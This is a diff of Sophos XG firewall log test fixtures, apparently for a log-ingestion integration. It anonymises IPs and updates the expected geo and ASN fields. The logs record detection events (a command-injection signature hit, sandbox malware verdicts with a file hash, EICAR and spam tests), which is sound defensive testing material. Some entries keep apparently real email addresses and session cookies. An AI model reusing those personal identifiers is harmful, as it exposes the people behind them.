log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=1881 signature_msg="SERVER-WEBAPP bad HTTP 1.1 request - potential worm attack" classification="access to a potentially vulnerable web application" rule_priority=2 src_ip=175.16.199.1 src_country_code=ROU dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=41528 dst_port=80 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="server-webapp" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:55 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=23 user_name="" signature_id=1616 signature_msg="PROTOCOL-DNS named version attempt" classification="Attempted Information Leak" rule_priority=1 src_ip=175.16.199.1 src_country_code=CHN dst_ip=175.16.199.1 dst_country_code=R1 protocol="UDP" src_port=58914 dst_port=53 platform="BSD,Linux,Mac,Other,Solaris,Unix,Windows" category="protocol-dns" target="Server" +<30>device="SFW" date=2020-05-18 time=14:38:56 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=020804407002 log_type="IDP" log_component="Signatures" log_subtype="Drop" priority=Warning idp_policy_id=7 fw_rule_id=25 user_name="" signature_id=53589 signature_msg="SERVER-WEBAPP DrayTek multiple products command injection attempt" classification="Web Application Attack" rule_priority=2 src_ip=175.16.199.1 src_country_code=NLD dst_ip=175.16.199.1 dst_country_code=R1 protocol="TCP" src_port=59476 dst_port=80 platform="Linux,Mac,Other,Unix,Windows" category="server-webapp" target="Server" <30>device="SFW" date=2018-05-23 time=16:20:34 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020703406001 log_type="IDP" log_component="Anomaly" log_subtype="Detect" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.0.168 src_country_code=R1 dst_ip=10.1.1.234 dst_country_code=R1 protocol="TCP" src_port=28938 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2018-05-23 time=16:16:43 timezone="BST" device_name="XG750" device_id=SFDemo-f64dd6be log_id=020704406002 log_type="IDP" log_component="Anomaly" log_subtype="Drop" priority=Warning idp_policy_id=1 fw_rule_id=2 user_name="" signature_id=26022 signature_msg="FILE-PDF EmbeddedFile contained within a PDF" classification="A Network Trojan was detected" rule_priority=1 src_ip=10.0.1.31 src_country_code=R1 dst_ip=10.1.0.115 dst_country_code=R1 protocol="TCP" src_port=40140 dst_port=25 platform="Windows" category="Malware Communication" target="Server" <30>device="SFW" date=2017-01-31 time=14:52:11 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=138301618041 log_type="Sandbox" log_component="Mail" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject="" @@ -79,11 +79,11 @@ <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44313350024-P29PUA log_id=136501618041 log_type="Sandbox" log_component="Web" log_subtype="Allowed" priority=Information user_name="" src_ip= filename="" filetype="" filesize=0 sha1sum="" source="" reason="eligible" destination="" subject="" <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136528618043 log_type="Sandbox" log_component="Web" log_subtype="Pending" priority=Information user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="pending" destination="" subject="" <30>device="SFW" date=2017-01-31 time=15:28:25 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="jsmith" src_ip=10.198.47.112 filename="19.exe" filetype="application/octet-stream" filesize=153010 sha1sum="3ce799580908df9ca0dc649aa8c2d06ab267e8c8" source="10.198.241.50" reason="cloud malicious" destination="" subject=" -<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=172.16.34.24 filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject="" -<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 -<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=89.68.140.204 localip=185.8.209.207 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=89.68.140.204 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:36 timezone="IST" device_name="CR750iNG-XP" device_id=C44310050024-P29PUA log_id=136502218042 log_type="Sandbox" log_component="Web" log_subtype="Denied" priority=Critical user_name="" src_ip=175.16.199.1 filename="SBTestFile1.pdf" filetype="application/pdf" filesize=1124 sha1sum="d910c4a81122c360fe57f67a04999425a65249db" source="sophostest.com" reason="cached malicious" destination="" subject="" +<30>device="SFW" date=2020-05-18 time=14:38:46 timezone="CEST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsxYNAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDoAitM4bv3XCA==;MapiSequence=10-GtgsIA==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7PxcrL" referer=- method=POST httpstatus=401 reason="-" extra="-" contenttype="-" useragent="Microsoft Office/16.0 (Windows NT 10.0; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=11199 bytessent=5669 bytesrcv=1419 fw_rule_id=79 +<30>device="SFW" date=2020-05-18 time=14:38:47 timezone="CEST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=webmail.elasticuser.com sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.1" url=/mapi/nspi/ querystring=?MailboxId=642ea57c-90ab-4571-8e05-c6997b2256f8@elastic.user.com cookie="MapiContext=MAPIAAAAAPaw98Xx0uDQ4tL/z/rX59b2x/LI+8z2x/+lhrKGtIO7jbmBsw0NAAAAAAAA;MapiRouting=UlVNOjdmNWY0OGE3LTM5OWItNDc4Yi04ZDgwLWFmZTRmMzAyZTViMDpeyft5bv3XCA==;MapiSequence=9-Km2JMg==;X-BackEndCookie=642ea57c-90ab-4571-8e05-c6997b2256f8=u56Lnp2ejJqByZrHyZ7Mys7Sm8zJnNLLnM3J0sbJxsvSnZzIxs2ans+ezMrLgYHNz83P0s/J0s3Pq87Pxc7Oxc3M" referer=- method=POST httpstatus=200 reason="-" extra="-" contenttype="application/mapi-http" useragent="Microsoft Office/16.0 (Windows NT 6.2; Microsoft Outlook 16.0.4954; Pro)" host=175.16.199.1 responsetime=14086 bytessent=1357 bytesrcv=1774 fw_rule_id=79 <30>device="SFW" date=2020-05-19 time=17:20:29 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8989 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/ querystring= cookie="-" referer=- method=GET httpstatus=403 reason="Static URL Hardening" extra="No signature found" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=19310 bytessent=726 bytesrcv=510 fw_rule_id=3 <30>device="SFW" date=2020-05-19 time=18:03:30 timezone="IST" device_name="XG230" device_id=1234567890123456 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="jsmith" server=www.iviewtest.com:8990 sourceip=10.198.235.254 localip=10.198.233.48 ws_protocol="HTTP/1.1" url=/download/eicarcom2.zip querystring= cookie="; PHPSESSID=jetkd9iadd969hsr77jpj4q974; _pk_id.1.fc3a=3a6250e215194a92.1485866024.1.1485866069.1485866024.; _pk_ses.1.fc3a=*" referer=http://www.iviewtest.com:8990/85-0-Download.html method=GET httpstatus=403 reason="Antivirus" extra="EICAR-AV-Test" contenttype="text/html" useragent="Mozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0" host=10.198.235.254 responsetime=403214 bytessent=739 bytesrcv=715 fw_rule_id=6 -<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=83.97.20.30 localip=216.167.51.72 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=83.97.20.30 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 +<30>device="SFW" date=2020-05-20 time=18:03:31 timezone="IST" device_name="XG230" device_id=1234567890123457 log_id=075000617071 log_type="WAF" log_component="Web Application Firewall" priority=Information user_name="-" server=- sourceip=175.16.199.1 localip=175.16.199.1 ws_protocol="HTTP/1.0" url=/ querystring="" cookie="-" referer="-" method=GET httpstatus=403 reason="WAF Anomaly" extra="Inbound Anomaly Score Exceeded (Total Score: 7, SQLi=, XSS=): Last Matched Message: Request Missing a User Agent Header" contenttype="text/html" useragent="-" host=175.16.199.1 responsetime=608 bytessent=5353 bytesrcv=295 fw_rule_id=3 <30>device="SFW" date=2017-02-01 time=14:17:35 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=2 <30>device="SFW" date=2017-02-01 time=14:19:47 timezone="IST" device_name="SG115" device_id=S110016E28BA631 log_id=106025618011 log_type="Wireless Protection" log_component="Wireless Protection" log_subtype="Information" priority=Information ap=A40024A636F7862 ssid=SPIDIGO2015 clients_conn_SSID=3 diff --git a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json index 3ad283e42e4..88c4c6cf9dd 100644 --- a/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json +++ b/packages/sophos/data_stream/xg/_dev/test/pipeline/test-sophos-xg.log-expected.json @@ -72,7 +72,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566058500Z", + "ingested": "2021-12-09T13:44:55.714793100Z", "original": "device=\"SFW\" date=2020-05-18 time=14:38:48 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041101618035 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Allowed\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"firewall@firewallgate.com\" to_email_address=\"Sysadmin@elasticuser.com\" email_subject=\"*ALERT* Sophos XG Firewall\" mailid=\"qkW2Y6-LxBk6U-vH-1590055245\" mailsize=19728 spamaction=\"QUEUED\" reason=\"Email has been accepted by Device and queued for scanning.\" src_domainname=\"elasticuser.com\" dst_domainname=\"\" src_ip=\"\" src_country_code=\"\" dst_ip=\"\" dst_country_code=\"\" protocol=\"TCP\" src_port=0 dst_port=0 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041101618035", "kind": "event", @@ -91,28 +91,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "log": { "level": "informational" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -120,30 +119,29 @@ "email": "info@pelasticuser.com" }, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "North America", - "region_iso_code": "US-FL", - "city_name": "Miami", - "country_iso_code": "US", - "country_name": "United States", - "region_name": "Florida", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -80.1826, - "lat": 25.7806 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199524, + "number": 4837, "organization": { - "name": "G-Core Labs S.A." + "name": "CHINA UNICOM China169 Backbone" } }, "port": 52742, "bytes": 0, - "ip": "92.38.133.63", + "ip": "175.16.199.1", "domain": "constant-big.email", "user": { "email": "telekommunikation@constant-big.email" @@ -197,12 +195,12 @@ "client": { "port": 52742, "bytes": 0, - "ip": "92.38.133.63" + "ip": "175.16.199.1" }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566069500Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"\u003cMzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=92.38.133.63 src_country_code=USA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", + "ingested": "2021-12-09T13:44:55.714802Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:49 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=041105613003 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Clean\" status=\"\" priority=Information fw_rule_id=22 user_name=\"\" av_policy_name=\"Default\" from_email_address=\"telekommunikation@constant-big.email\" to_email_address=\"info@pelasticuser.com\" email_subject=\"Telefonservice statt Anrufbeantworter\" mailid=\"\u003cMzQ4NzU1ODA4Mw==.70c409993fe53cb7c5e32c9974adf8ff@constant-big\" mailsize=13371 spamaction=\"Accept\" reason=\"Mail is Clean.\" src_domainname=\"constant-big.email\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=USA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=52742 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Other\"", "code": "041105613003", "kind": "event", "action": "Clean", @@ -220,28 +218,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -249,30 +246,29 @@ "email": "hein.mueck@elasticuser.de" }, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "South America", - "region_iso_code": "BR-SP", - "city_name": "Cabreuva", - "country_iso_code": "BR", - "country_name": "Brazil", - "region_name": "Sao Paulo", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -47.0763, - "lat": -23.3149 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 262696, + "number": 4837, "organization": { - "name": "Turbonet Telecomunicações" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 51789, "bytes": 0, - "ip": "187.95.82.175", + "ip": "175.16.199.1", "domain": "17buddies.net", "user": { "email": "ripxfc@17buddies.net" @@ -326,12 +322,12 @@ "client": { "port": 51789, "bytes": 0, - "ip": "187.95.82.175" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566077400Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"\u003coE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=187.95.82.175 src_country_code=BRA dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", + "ingested": "2021-12-09T13:44:55.714808300Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:50 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123456 log_id=041107413001 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"Spam\" from_email_address=\"ripxfc@17buddies.net\" to_email_address=\"hein.mueck@elasticuser.de\" email_subject=\"nimm dringend Geld\" mailid=\"\u003coE6Bl1v.H9RXAIt.N5WB1my7xW.JavaMail.app@9in8-vovZnu.prod.17bud\" mailsize=2025 spamaction=\"Reject\" reason=\"Mail detected as SPAM.\" src_domainname=\"17buddies.net\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=BRA dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=51789 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041107413001", "kind": "alert", "action": "Spam", @@ -351,28 +347,27 @@ "server": { "port": 25, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "log": { "level": "warning" }, "destination": { "geo": { - "continent_name": "Europe", - "region_iso_code": "CH-VD", - "city_name": "Saint-Prex", - "country_iso_code": "CH", - "country_name": "Switzerland", - "region_name": "Vaud", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": 6.4599, - "lat": 46.4796 - } + "lon": 125.3228, + "lat": 43.88 + }, + "country_iso_code": "CN" }, "as": { - "number": 199567, + "number": 4837, "organization": { - "name": "Fr. Sauter AG" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 25, @@ -380,27 +375,29 @@ "email": "info@elasticuser.com" }, "bytes": 0, - "ip": "185.8.209.194" + "ip": "175.16.199.1" }, "source": { "geo": { - "continent_name": "Europe", - "country_name": "United Kingdom", + "continent_name": "Asia", + "region_iso_code": "CN-JL", + "country_name": "China", + "region_name": "Jilin", "location": { - "lon": -0.1224, - "lat": 51.4964 + "lon": 125.3228, + "lat": 43.88 }, - "country_iso_code": "GB" + "country_iso_code": "CN" }, "as": { - "number": 12488, + "number": 4837, "organization": { - "name": "Krystal Hosting Ltd" + "name": "CHINA UNICOM China169 Backbone" } }, "port": 55002, "bytes": 0, - "ip": "77.72.3.56", + "ip": "175.16.199.1", "domain": "ELTOBGI.COM", "user": { "email": "SHERIF.TOBGI@ELTOBGI.COM" @@ -454,12 +451,12 @@ "client": { "port": 55002, "bytes": 0, - "ip": "77.72.3.56" + "ip": "175.16.199.1" }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566082100Z", - "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"\u003c20200518070235.C1623996C64F9957@ELTOBGI.COM\u003e\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=77.72.3.56 src_country_code=GBR dst_ip=185.8.209.194 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"", + "ingested": "2021-12-09T13:44:55.714814200Z", + "original": "device=\"SFW\" date=2020-05-18 time=14:38:51 timezone=\"CEST\" device_name=\"XG230\" device_id=1234567890123457 log_id=045908413004 log_type=\"Anti-Spam\" log_component=\"SMTPS\" log_subtype=\"Probable Spam\" status=\"\" priority=Warning fw_rule_id=22 user_name=\"\" av_policy_name=\"rule3\" from_email_address=\"SHERIF.TOBGI@ELTOBGI.COM\" to_email_address=\"info@elasticuser.com\" email_subject=\"09F1A19017 - 65T BP LNG Hybrid - TS-V-061-01 - HVAC Package - RFQ - BCD - 27-May-20\" mailid=\"\u003c20200518070235.C1623996C64F9957@ELTOBGI.COM\u003e\" mailsize=1032152 spamaction=\"Prefix Subject\" reason=\"Sender IP address is blacklisted.\" src_domainname=\"ELTOBGI.COM\" dst_domainname=\"\" src_ip=175.16.199.1 src_country_code=GBR dst_ip=175.16.199.1 dst_country_code=DEU protocol=\"TCP\" src_port=55002 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"RBL\"", "code": "045908413004", "kind": "alert", "action": "Probable Spam", @@ -553,7 +550,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566085600Z", + "ingested": "2021-12-09T13:44:55.714820100Z", "original": "device=\"SFW\" date=2017-01-31 time=18:34:41 timezone=\"IST\" device_name=\"CR750iNG-XP\" device_id=C44313350024-P29PUA log_id=041113413005 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"gaurav\" av_policy_name=\"Gaurav123\" from_email_address=\"gaurav1@iview.com\" to_email_address=\" gaurav2@iview.com\" email_subject=\"RPD Spam Test: Spam\" mailid=\"\u003ca22c9da6-19e5-4764-2836-3f48d7dcc329@iview.com\u003e\" mailsize=405 spamaction=\"Accept\" reason=\"\" src_domainname=\" iview.com\" dst_domainname=\"\" src_ip=10.198.47.71 src_country_code=R1 dst_ip=10.198.233.61 dst_country_code=R1 protocol=\"TCP\" src_port=22420 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041113413005", "kind": "alert", @@ -648,7 +645,7 @@ }, "event": { "severity": 4, - "ingested": "2021-06-30T11:19:55.566090900Z", + "ingested": "2021-12-09T13:44:55.714826Z", "original": "device=\"SFW\" date=2018-06-06 time=11:10:11 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041114413006 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"Outbound Probable Spam\" status=\"\" priority=Warning fw_rule_id=0 user_name=\"\" av_policy_name=\"rule 8\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"RPD Spam test: Bulk\" mailid=\"\u003cc63b1eb2-1c17-73ac-fcc3- 20e8831dc3d3@postman.local\u003e\" mailsize=439 spamaction=\"Drop\" reason=\"Mail detected as OUTBOUND PROBABLE SPAM.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.234.240 dst_country_code=R1 protocol=\"TCP\" src_port=58043 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"Spam\"", "code": "041114413006", "kind": "alert", @@ -743,7 +740,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566096300Z", + "ingested": "2021-12-09T13:44:55.714831800Z", "original": "device=\"SFW\" date=2018-06-06 time=12:50:07 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041121613009 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"DLP\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"postman\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman. local\" email_subject=\"Fwd: TESt\" mailid=\"c0000002-1528269606\" mailsize=5041 spamaction=\"DROP\" reason=\"Email containing confidential data detected. Relevant Data Protection Policy applied.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.17.121 dst_country_code=R1 protocol=\"TCP\" src_port=60134 dst_port=25 sent_bytes=0 recv_bytes=0 quarantine_reason=\"DLP\"", "code": "041121613009", "kind": "alert", @@ -838,7 +835,7 @@ }, "event": { "severity": 6, - "ingested": "2021-06-30T11:19:55.566102700Z", + "ingested": "2021-12-09T13:44:55.714838100Z", "original": "device=\"SFW\" date=2018-06-06 time=12:51:34 timezone=\"IST\" device_name=\"SG430\" device_id=S4000806149EE49 log_id=041122613010 log_type=\"Anti-Spam\" log_component=\"SMTP\" log_subtype=\"SPX\" status=\"\" priority=Information fw_rule_id=0 user_name=\"\" av_policy_name=\"None\" from_email_address=\"pankhil@postman.local\" to_email_address=\"pankhil1@Postman.local\" email_subject=\"[secure:pankhil]\" mailid=\"c0000003-1528269693\" mailsize=442 spamaction=\"Accept\" reason=\"SPX Template of type Specified by Sender successfully applied on Email.\" src_domainname=\"postman.local\" dst_domainname=\"\" src_ip=10.198.16.121 src_country_code=R1 dst_ip=10.198.16.204 dst_country_code=R1 protocol=\"TCP\" src_port=60298 dst_port=25 